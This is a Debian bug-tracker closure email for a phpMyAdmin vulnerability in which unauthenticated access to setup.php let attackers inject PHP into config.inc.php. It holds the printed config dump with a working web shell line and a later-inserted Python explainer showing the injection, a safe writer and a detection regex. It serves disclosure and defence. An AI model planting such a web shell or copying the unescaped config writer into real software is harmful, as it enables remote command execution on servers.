Your message dated Wed, 14 Oct 2009 10:22:16 +0000
with message-id <[email protected]>
and subject line Bug#543460: fixed in phpmyadmin 4:3.2.2.1-1
has caused the Debian Bug report #543460,
regarding phpmyadmin: No password protection for setup.php script
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
543460: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543460
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: phpmyadmin
Version: 4:2.9.1.1-11
Severity: grave
Tags: security
Justification: user security hole
After install, you can access http://{host}/phpmyadmin/scripts/setup.php
without entering any password.
By adding a new host in the configuration, an attacker can submit malicious code
to execute commands as the www-data user.
This is a dump of /var/lib/phpmyadmin/config.inc.php after the attack:
/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
/* End of servers configuration */
-- System Information:
Debian Release: 4.0
APT prefers oldstable
APT policy: (500, 'oldstable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-686
Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8)
Versions of packages phpmyadmin depends on:
ii debconf [debconf-2.0 1.5.11etch2 Debian configuration management sy
ii libapache2-mod-php5 5.2.0+dfsg-8+etch15 server-side, HTML-embedded scripti
ii perl 5.8.8-7etch6 Larry Wall's Practical Extraction
ii php5-mysql 5.2.0+dfsg-8+etch15 MySQL module for php5
ii ucf 2.0020 Update Configuration File: preserv
Versions of packages phpmyadmin recommends:
ii apache2-mpm-prefork [http 2.2.3-4+etch10 Traditional model for Apache HTTPD
pn php5-gd | php4-gd <none> (no description available)
pn php5-mcrypt | php4-mcrypt <none> (no description available)
-- debconf information:
phpmyadmin/setup-username: admin
phpmyadmin/reconfigure-webserver:
phpmyadmin/restart-webserver: false
--- End Message ---
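As an added example (not code from the bug report, from Debian, or from phpMyAdmin), the Python below illustrates the mechanism behind the dump above: a host value pasted between quotes without escaping terminates the PHP string literal, so everything after the first quote becomes code. It shows the unescaped writer beside one that serialises the value as a proper PHP single-quoted literal, and a defender-side check that flags any `$cfg` assignment in config.inc.php that is not a single well-formed literal assignment. The config layout and the sample lines are reconstructed from the dump in the report; the function names and the breakout sample are my own assumptions.

```python
import re

# Constructed sample: the injected line from the report's config dump,
# re-joined onto one line (mail wrapping split it in the original).
INJECTED_LINE = ("$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';"
                 "system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';"
                 "eval($_GET['p']);echo '</pre>';};//'] = 'localhost';")

# Constructed sample: the config block from the report with the line above.
DUMP = "\n".join([
    "/* Server (config:root) [1] */",
    "$i++;",
    INJECTED_LINE,
    "$cfg['Servers'][$i]['extension'] = 'mysqli';",
    "$cfg['Servers'][$i]['connect_type'] = 'tcp';",
    "$cfg['Servers'][$i]['compress'] = false;",
    "$cfg['Servers'][$i]['auth_type'] = 'config';",
    "$cfg['Servers'][$i]['user'] = 'root';",
    "/* End of servers configuration */",
])

# Constructed sample of a host line as setup.php normally writes it.
BENIGN_LINE = "$cfg['Servers'][$i]['host'] = 'localhost';"

# Constructed, harmless breakout value: a quote followed by PHP code.
BREAKOUT = "x'; echo 'injected';//"


def php_single_quoted(value: str) -> str:
    """Serialise a string as a PHP single-quoted literal.
    Inside '...' PHP treats only backslash and single quote specially."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def write_host_unsafe(host: str) -> str:
    """The pattern that produced the dump: the value is concatenated
    between quotes unescaped, so a quote in it ends the literal."""
    return "$cfg['Servers'][$i]['host'] = '" + host + "';"


def write_host_safe(host: str) -> str:
    """Hardened form: the value is always a single PHP string literal."""
    return "$cfg['Servers'][$i]['host'] = " + php_single_quoted(host) + ";"


# Exactly one assignment per line: a $cfg key, '=', then either a
# single-quoted literal (with backslash escapes) or a bare bool/int,
# then ';' and nothing else.
ASSIGN_RE = re.compile(
    r"""^\$cfg(\[[^\]]+\])+\s*=\s*(?:'(?:[^'\\]|\\.)*'|true|false|-?\d+)\s*;\s*$"""
)


def suspicious_config_lines(config_text: str) -> list:
    """Return (line_no, line) for every $cfg line that is not a single
    well-formed literal assignment. Any trailing code on such a line is
    something the setup script would never have written on its own."""
    hits = []
    for n, line in enumerate(config_text.splitlines(), 1):
        s = line.strip()
        if s.startswith("$cfg") and not ASSIGN_RE.match(s):
            hits.append((n, s))
    return hits


if __name__ == "__main__":
    for n, line in suspicious_config_lines(DUMP):
        print(f"line {n}: {line[:60]}...")
    print(write_host_unsafe(BREAKOUT))
    print(write_host_safe(BREAKOUT))
```

Run against the report's dump, the checker flags only the `host` line; the same breakout value passed through `write_host_safe` stays inside the literal and is not flagged. Reading the file with a regex this strict is deliberate: a generated config should contain nothing but literal assignments, so anything else on a `$cfg` line is worth an alert.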
--- Begin Message ---
Source: phpmyadmin
Source-Version: 4:3.2.2.1-1
We believe that the bug you reported is fixed in the latest version of
phpmyadmin, which is due to be installed in the Debian FTP archive:
phpmyadmin_3.2.2.1-1.diff.gz
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1.diff.gz
phpmyadmin_3.2.2.1-1.dsc
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1.dsc
phpmyadmin_3.2.2.1-1_all.deb
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1-1_all.deb
phpmyadmin_3.2.2.1.orig.tar.gz
to pool/main/p/phpmyadmin/phpmyadmin_3.2.2.1.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Michal Čihař <[email protected]> (supplier of updated phpmyadmin package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Wed, 14 Oct 2009 10:58:28 +0200
Source: phpmyadmin
Binary: phpmyadmin
Architecture: source all
Version: 4:3.2.2.1-1
Distribution: unstable
Urgency: low
Maintainer: Thijs Kinkhorst <[email protected]>
Changed-By: Michal Čihař <[email protected]>
Description:
phpmyadmin - MySQL web administration tool
Closes: 535044 543460
Changes:
phpmyadmin (4:3.2.2.1-1) unstable; urgency=low
.
* New upstream version.
- Fixes XSS (PMASA-2009-6, CVE-2009-3696, CVE-2009-3697).
* Register documentation on doc-base.
* Use mootools from Debian package rather than own copy.
* Allow saving of configuration from setup script only after explicit action
from administrator (Closes: #535044, #543460).
Checksums-Sha1:
043ba4b0a190929ec451ac8ff8faff147b0fa2f3 1230 phpmyadmin_3.2.2.1-1.dsc
80c8e2091347236bfc0f135d3f92753f760e6947 3709036 phpmyadmin_3.2.2.1.orig.tar.gz
0bc06da6192a224c575edd95dddb5071f11db7a4 38175 phpmyadmin_3.2.2.1-1.diff.gz
05eec7a14f3941b2caf7e70f66883c7c3aceaa74 3703786 phpmyadmin_3.2.2.1-1_all.deb
Checksums-Sha256:
24548da5b8ee77e1bef8d0658689969ea825ee0f869435198326ce358047881a 1230 phpmyadmin_3.2.2.1-1.dsc
99957d98e2610d5f77f83db2e025caecae344d590c8f5694412e5f942d6c0768 3709036 phpmyadmin_3.2.2.1.orig.tar.gz
ad0d35e124fb6020d4ea5b1d74923ab1fb2bbc882909502fafcd17b2a23b1240 38175 phpmyadmin_3.2.2.1-1.diff.gz
ead0d01e3061c3989b5ee7d4a944a89d374948e4e30fa7c008de4c4bc67b5936 3703786 phpmyadmin_3.2.2.1-1_all.deb
Files:
77812ffab6319c421d847d9807321933 1230 web extra phpmyadmin_3.2.2.1-1.dsc
42637af1d7d390fb94ae5460b3f84153 3709036 web extra phpmyadmin_3.2.2.1.orig.tar.gz
728c63f9d79c655715a20d9980767ea0 38175 web extra phpmyadmin_3.2.2.1-1.diff.gz
c0f61d056b8d81b08da0d8aea2468370 3703786 web extra phpmyadmin_3.2.2.1-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAkrVkwUACgkQ3DVS6DbnVgQIhQCbBwo7+KDCrihyieNpLnjfQTMo
4dcAnRAvOTwt5xTLRKS0JIjI4B+CRR4s
=Jrvl
-----END PGP SIGNATURE-----
--- End Message ---